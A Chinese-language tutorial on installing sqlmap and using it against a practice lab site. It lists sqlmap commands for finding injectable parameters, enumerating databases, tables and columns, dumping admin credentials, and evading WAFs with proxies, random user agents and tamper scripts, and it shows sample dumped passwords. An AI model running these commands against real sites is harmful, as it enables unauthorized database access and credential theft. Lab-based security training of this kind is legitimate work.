sqlmap安装
sqlmap安装包
链接:https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g
提取码:0wc5
sqlmap命令大全
链接:https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA
提取码:dltg
在安装sqlmap之前要先安装python环境
python安装包
链接:https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug
提取码:e0n5
安装好python环境之后,将sqlmap文件放在python的目录里面
查看目录
输入sqlmap命令,运行sqlmap
安装完成!
sqlmap使用
这边使用的是封神台的靶场http://rhiq8003.ia.aqlab.cn/?id=1
演示
命令:-u,作用:确定目标网站。
使用方法:python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"
命令:--dump,作用:查数据。
使用方法:python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dump
回显出现Parameter表示该网站存在漏洞
基础命令
命令:-h,作用:查看帮助。使用方法:python sqlmap.py -h
命令:-u,作用:确定目标网站。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1”
命令:-r ,作用:确定目标网站。使用方法:python sqlmap.py -r 1.txt
命令:–data,作用:确定参数。python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1&pid=2&ssid=3” --data=“pid=2&ssid=3”
ps:当你手动测试网站的时候,确定某个参数存在漏洞。提高渗透的效率。
ps:逐参删除法。参数挨个删除,找到能够【影响】网站的参数。那么这个参数,就很有可能是要测试的参数。
命令:–dbs ,作用:查询库名相关的数据。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
[] information_schema
[] maoshe
[*] test
命令:-D,作用:指定数据库。↓↓↓↓联合使用↓↓↓↓
命令:–tables,作用:查询所有表名。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe --tables
|admin |
| dirs |
| news |
| xss |
ps:数据库的结构:库、表、列、数据
命令:-T,作用:指定表名。
命令:–columns,查看所有的列名。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin --columns
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11)
命令:-C ,总用:指定列名。↓↓↓↓联合使用↓↓↓↓
命令:–dump,作用:查数据。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin -C password --dump
ps:牢饭命令
password |
| hellohack |
| zkaqbanban |
使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dump
进阶命令
命令:–proxy,作用:使用代理。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/”
命令:–random-agent ,作用:改变UA。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/” --random-agent
命令:–cookie,作用:使用网站身份去扫描网站。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --cookie=“A=14; jwt_id=10225;”
使用-r,就可以不用–cookie
命令:–level ,作用:提高扫描强度。默认1
命令:–risk ,作用:提高风险等级。 默认1
使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --level 3 --risk 2
命令:–batch ,作用:默认选择,自动判断。。python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --batch
Y/N
命令:–tamper,作用:使用脚本,绕过IPS、WAF等。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tamper=“tamper/between.py,tamper/randomcase.py”
ps:大多数情况没啥用。
个人要求:
1.掌握绕WAF的方法。—> https://bbs.zkaq.cn/t/6205.html
2.掌握写python脚本。 --> 自学
ps:本篇文章主要资料来自掌控安全的杰斯老师!
